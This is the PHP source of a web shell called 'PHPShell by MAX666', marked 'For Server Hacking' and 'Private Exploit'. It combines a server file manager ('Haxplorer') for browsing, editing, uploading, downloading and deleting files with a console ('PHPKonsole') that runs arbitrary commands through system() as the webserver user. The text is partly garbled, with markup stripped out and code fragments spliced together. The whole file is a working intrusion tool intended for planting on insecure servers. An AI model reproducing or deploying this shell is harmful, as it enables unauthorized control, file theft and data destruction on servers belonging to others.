=4); $scriptTitle = "PHPShell"; $scriptident = "$scriptTitle by MAX666"; $urlAdd = ""; $formAdd = ""; function walkArray($array){ while (list($key, $data) = each($array)) if (is_array($data)) { walkArray($data); } else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} } if (isset($_PUT)) walkArray($_PUT); if (isset($_GET)) walkArray($_GET); if (isset($_POST)) walkArray($_POST); $pos = strpos($urlAdd, "s=r"); if (strval($pos) != "") { $urlAdd= substr($urlAdd, 0, $pos); } $urlAdd .= "&s=r&"; if (empty($Pmax)) $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ if (empty($Pidx)) $Pidx = 0; $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); $scriptdate = "For Server Hacking"; $scriptver = "Private Exploit"; $LOCAL_IMAGE_DIR = "img"; $REMOTE_IMAGE_URL = "img"; $img = array( "Edit" => "edit.gif", "Download" => "download.gif", "Upload" => "upload.gif", "Delete" => "delete.gif", "View" => "view.gif", "Rename" => "rename.gif", "Move" => "move.gif", "Copy" => "copy.gif", "Execute" => "exec.gif" ); while (list($id, $im)=each($img)) if (file_exists("$LOCAL_IMAGE_DIR/$im")) $img[$id] = "\"$id\""; else $img[$id] = "[$id]"; /* HTTP AUTHENTICATION */ if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { setcookie("noauth",""); Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); Header( "HTTP/1.0 401 Unauthorized"); echo "Your username or password is incorrect"; exit ; } function buildUrl($display, $url) { global $urlAdd; $url = $SFileName . "?$urlAdd$url"; return "$display"; } function sp($mp) { for ( $i = 0; $i < $mp; $i++ ) $ret .= " "; return $ret; } function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } function Mydeldir($Fdir) { if (is_dir($Fdir)) { $Fh=@opendir($Fdir); while ($Fbuf = readdir($Fh)) if (($Fbuf != ".") && ($Fbuf != "..")) Mydeldir("$Fdir/$Fbuf"); @closedir($Fh); return rmdir($Fdir); } else { return unlink($Fdir); } } function arrval ($array) { list($key, $data) = $array; return $data; } function formatsize($insize) { $size = $insize; $add = "B"; if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "KB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "MB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "GB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "TB"; } return "$size $add"; } if ($cmd != "downl") { ?> <?php echo $SFileName ?>
- -

".sp(3)."\n\n\n\n COULD NOT OPEN THIS DIRECTORY!!!
".sp(3)."\n THE SCRIPT WILL RESULT IN AN ERROR!!!

".sp(3)."\n PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...

\n\n\n\n"; } if (function_exists('realpath')) { $partdir = realpath($dir); } else { $partdir = $dir; } if (strlen($partdir) >= 100) { $partdir = substr($partdir, -100); $pos = strpos($partdir, "/"); if (strval($pos) != "") { $partdir = "<-- ...".substr($partdir, $pos); } $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); } ?>
" method="POST">
 HAXPLORER - Server Files Browser... 

 Browsing: 
 GO 
$Pmax ) { $from = $Pidx * $Pmax; $to = ($Pidx + 1) * $Pmax-1; if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) $to = count($filelist) - 1; if ($to > count($filelist)-1) $to = count($filelist)-1; $Dcontents = array(); For ($Fi = $from; $Fi <= $to; $Fi++) { $Dcontents[] = $filelist[$Fi]; } } else { $Dcontents = $filelist; } $tdcolors = array("lighttd", "darktd"); while (list ($key, $file) = each ($Dcontents)) { if (!$tdcolor=arrval(each($tdcolors))) { reset($tdcolors); $tdcolor = arrval(each($tdcolors)); } if (is_dir("$dir/$file")) { /* */ /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo ""; echo "\n"; } else { /* */ /* */ if ( @is_readable("$dir/$file") ) echo "\n"; else echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo ""; echo "\n"; } } echo "
 Filename   Actions (Attempt to perform)   Size   Attributes   Modification Date 
".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
".sp(2)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo "  
   \n"; echo "D"; if ( @is_readable("$dir/$file") ) { echo "R"; } if (function_exists('is_writeable')) { if ( @is_writeable("$dir/$file") ) { echo "W"; } } else { echo "(W)"; } if ( @is_executable("$dir/$file") ) { echo "X"; } echo "  \n"; echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "
".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
".sp(3).$file.sp(9)."
  \n"; /* */ echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; /* */ echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; /* */ echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; /* */ if ( @is_executable("$dir/$file") ) echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; /* */ echo sp(2)."
\n"; $size = @filesize("$dir/$file"); If ($size != false) { $filesizes += $size; echo "  ".formatsize($size).""; } else echo "  0 B"; echo "    \n"; if ( @is_readable("$dir/$file") ) echo "R"; if ( @is_writeable("$dir/$file") ) echo "W"; if ( @is_executable("$dir/$file") ) echo "X"; if (function_exists('is_uploaded_file')){ if ( @is_uploaded_file("$dir/$file") ) echo "U"; } else { echo "(U)"; } echo "  \n"; echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "
\n\n"; function printpagelink($a, $b, $link = ""){ if ($link != "") echo "| $a - $b |"; else echo "| $a - $b |"; } if ( count($filelist)-1 > $Pmax ) { echo ""; } echo "
\n"; echo "  ".@count ($dirn)." Dir(s), ".@count ($filen)." File(s)  \n"; echo "\n"; echo "  Total filesize: ".formatsize($filesizes)."  
Page:
"; $Fi = 0; while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = ($Fi + 1) * $Pmax - 1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "   "; $Fi++; } $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = count($filelist)-1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "
\n
"; if ($isGoodver) { echo "\n"; } else { echo "\n"; } /* */ echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo ""; echo "
 Server's PHP Version:    $PHPVer 
 Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
 Other actions:    ".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
 Script Location:    $PATH_TRANSLATED
 Your IP:    $REMOTE_ADDR 
 Browsing Directory:   $partdir 
 Legend:  \n"; echo ""; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "
D:  Directory.
R:  Readable.
W:  Writeable.
X:  Executable.
U:  HTTP Uploaded File.
"; echo "
"; @closedir($h); } elseif ( $cmd=="execute" ) {/**/ echo system("$file"); } elseif ( $cmd=="deldir" ) { /* */ echo "
"; } elseif ( $cmd=="delfile" ) { /* */ echo "
" ; if ($auth == "yes") { if (Mydeldir($file)==false) { echo "Could not remove \"$file\"
Permission denied, or directory not empty..."; } else { echo "Successfully removed \"$file\"
"; } echo ""; } else { echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
"; } echo "
"; } elseif ( $cmd=="newfile" ) { /* */ echo "
" ; if ($auth == "yes") { if (@unlink($file)==false) { echo "Could not remove \"$file\"
"; } else { echo "Successfully removed \"$file\"
"; } echo "
"; } else { echo "Are you sure you want to delete \"$file\" ?
"; } echo "
"; $i = 1; while (file_exists("$lastdir/newfile$i.txt")) $i++; $file = fopen("$lastdir/newfile$i.txt", "w+"); if ($file == false) echo "Could not create the new file...
"; else echo "Successfully created: \"$lastdir/newfile$i.txt\"
"; echo "
"; } elseif ( $cmd=="newdir" ) { /* */ echo "
" ; $i = 1; while (is_dir("$lastdir/newdir$i")) $i++; $file = mkdir("$lastdir/newdir$i", 0777); if ($file == false) echo "Could not create the new directory...
"; else echo "Successfully created: \"$lastdir/newdir$i\"
"; echo "
"; } elseif ( $cmd=="edit" ) { /* */ $contents = ""; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { $contents .= htmlentities( $line ) ; } echo "
"; echo "M
\n"; echo "\n"; echo "EDIT FILE: $file
\n"; echo "
\n"; echo "\n"; echo ""; echo "
"; echo "
"; } elseif ( $cmd=="saveedit" ) { /* */ $fo = fopen($file, "w"); $wrret = fwrite($fo, stripslashes($contents)); $clret = fclose($fo); } elseif ( $cmd=="downl" ) { /* */ $downloadfile = urldecode($file); if (function_exists("basename")) $downloadto = basename ($downloadfile); else $downloadto = "download.ext"; if (!file_exists("$downloadfile")) echo "The file does not exist"; else { $size = @filesize("$downloadfile"); if ($size != false) { $add="; size=$size"; } else { $add=""; } header("Content-Type: application/download"); header("Content-Disposition: attachment; filename=$downloadto$add"); $fp=fopen("$downloadfile" ,"rb"); fpassthru($fp); flush(); } } elseif ( $cmd=="upload" ) { /* */ ?>
Welcome to the upload section... Please note that the destination file will be
overwritten if it already exists!!!

" method="post"> Select local file:


" method="POST">
*/ echo "
"; if (file_exists($userfile)) $res = copy($userfile, "$dir/$userfile_name"); echo "Uploaded \"$userfile_name\" to \"$userfile\";
\n"; if ($res) { echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n

"; echo "Local filename: \"$userfile_name\".\n
Remote filename: \"$userfile\".\n
"; echo "Filesize: ".formatsize($userfile_size).".\n
Filetype: $userfile_type.\n
"; } else { echo "Could not move uploaded file; Action aborted..."; } echo "
" ; echo "

"; } elseif ( $cmd=="file" ) { /* */ echo "
"; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { echo spacetonbsp(@htmlentities($line))."
\n"; } echo "
"; } elseif ( $cmd=="ren" ) { /* */ if (function_exists('is_dir')) { if (is_dir("$oldfile")) { $objname = "Directory"; $objident = "Directory"; } else { $objname = "Filename"; $objident = "file"; } } echo "
 Rename a file: 

\n"; If (empty($newfile) != true) { echo "
"; $return = @rename($oldfile, "$olddir$newfile"); if ($return) { echo "$objident renamed successfully:

Old $objname: \"$oldfile\".
New $objname: \"$olddir$newfile\""; } else { if ( @file_exists("$olddir$newfile") ) { echo "Error: The $objident does already exist...

\"$olddir$newfile\"

Hit your browser's back to try again..."; } else { echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; } } echo "
" ; } else { $dpos = strrpos($oldfile, "/"); if (strval($dpos)!="") { $olddir = substr($oldfile, 0, $dpos+1); } else { $olddir = "$lastdir/"; } $fpos = strrpos($oldfile, "/"); if (strval($fpos)!="") { $inputfile = substr($oldfile, $fpos+1); } else { $inputfile = ""; } echo "
\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "Rename \"$oldfile\" to:
\n"; echo "
"; echo "
"; echo "
"; } } else if ( $cmd == "con") { ?>

PHPKonsole

" method="post">
Current working directory: Root/', $PHP_SELF, $stderr); if (!empty($work_dir_splitted[0])) { $path = ''; for ($i = 0; $i < count($work_dir_splitted); $i++) { $path .= '/' . $work_dir_splitted[$i]; printf('%s/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); } } ?> Choose new working directory:

Command:

Enable stderr-trapping? >

*/ $isMainMenu = true; ?>
 .:: Main Menu ::. 

==> Haxplorer <==", "cmd=dir&dir=.").sp(2); ?> Haxplorer is a server side file browser wich (ab)uses the directory object to list the files and directories stored on a webserver. This handy tools allows you to manage files and directories on a unsecure server with php support.

This entire script is coded for unsecure servers, if your server is secured the script will hide commands or will even return errors to your browser...

==> PHPKonsole <==", "cmd=con").sp(2); ?>
PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...

This function will only work if the server supports php and the execute commands...


  [ Main Menu ] ", "cmd=&dir="); ?>     [ PHPKonsole ] ", "cmd=con"); ?>     [ Haxplorer ] ", "cmd=dir&dir=."); ?>   

  - -